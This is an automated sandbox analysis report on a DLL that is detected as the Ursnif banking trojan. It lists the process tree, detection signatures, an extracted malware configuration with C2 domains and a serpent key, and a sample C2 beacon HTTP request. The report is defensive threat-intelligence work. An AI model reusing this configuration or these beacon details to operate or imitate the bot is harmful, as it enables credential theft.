Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report B6VQd36tt6.dll

Overview

General Information

Sample Name:B6VQd36tt6.dll
Analysis ID:500299
MD5:c4c060ec6b1e42d70972d0af66a04e66
SHA1:3ef84847fceb31b8814c12c94c57c72a5281d6f5
SHA256:47715e425398283d53019c270311ad0c709f660048d2f884d5116d80b983743f
Tags:BRTdllgeoGoziISFBITAUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3272 cmdline: loaddll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 3144 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5692 cmdline: rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5256 cmdline: rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 868 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6284 cmdline: rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 832 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 2772 cmdline: rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 1984 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 644 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 28 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.loaddll32.exe.6f030000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              4.0.rundll32.exe.6f030000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.2.loaddll32.exe.2d094a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.2.rundll32.exe.6f030000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.2.rundll32.exe.4c394a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: B6VQd36tt6.dllVirustotal: Detection: 16%Perma Link
                      Source: B6VQd36tt6.dllReversingLabs: Detection: 24%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: areuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: breuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: https://areuranel.website/Virustotal: Detection: 6%Perma Link
                      Source: B6VQd36tt6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.6:49761 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.6:49763 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.6:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.199.194:443 -> 192.168.2.6:49778 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.6:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.6:49780 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.178.34:443 -> 192.168.2.6:49781 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.6:49782 version: TLS 1.2
                      Source: B6VQd36tt6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb?1 source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbl< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000014.00000003.606688005.0000000004963000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.596009652.000000000280B000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606688005.0000000004963000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000E.00000003.586440457.0000000004A14000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606608773.0000000004952000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdbK source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdb^8 source: WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbH source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.578075706.00000000027EA000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594966351.0000000002816000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000E.00000003.586394801.0000000004A23000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600018161.0000000005674000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb: source: WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb-1 source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000E.00000003.577718554.00000000027DE000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.596009652.000000000280B000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000E.00000003.586440457.0000000004A14000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606608773.0000000004952000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb9 source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb~ source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb91 source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000E.00000003.586440457.0000000004A14000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606608773.0000000004952000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb} source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb9 source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbx< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbt< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: imagehlp.pdbh source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbb< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.751009999.000000006F0AB000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.753309847.000000006F0AB000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584623901.000000006F0AB000.00000002.00020000.sdmp, B6VQd36tt6.dll
                      Source: Binary string: sfc_os.pdbd source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000E.00000003.578075706.00000000027EA000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594966351.0000000002816000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000E.00000003.586440457.0000000004A14000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599691898.0000000005662000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606608773.0000000004952000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbV source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000E.00000003.586428949.0000000004A10000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600086412.0000000005660000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606750760.0000000004950000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbp source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbb source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb1 source: WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000E.00000003.579171572.00000000027E4000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.594931191.0000000002810000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.599728775.0000000005668000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.606801196.0000000004957000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000E.00000003.586394801.0000000004A23000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.600018161.0000000005674000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.599851558.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdbJ< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000E.00000003.586282107.0000000004831000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.606501610.0000000004981000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb~< source: WerFault.exe, 0000000E.00000003.586452775.0000000004A17000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.178.34 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.178.98 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187Jump to behavior
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.161.50 40.97.161.50
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQATX6Vpot/p9H1S_2FBpU5gj/XH9RZi7pSy90EfKCN0xoX/QAyaPWXD19YFLug2/I6ErSp8Uq8hZ5g3/WwbSra7jr8/n3VI4u.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
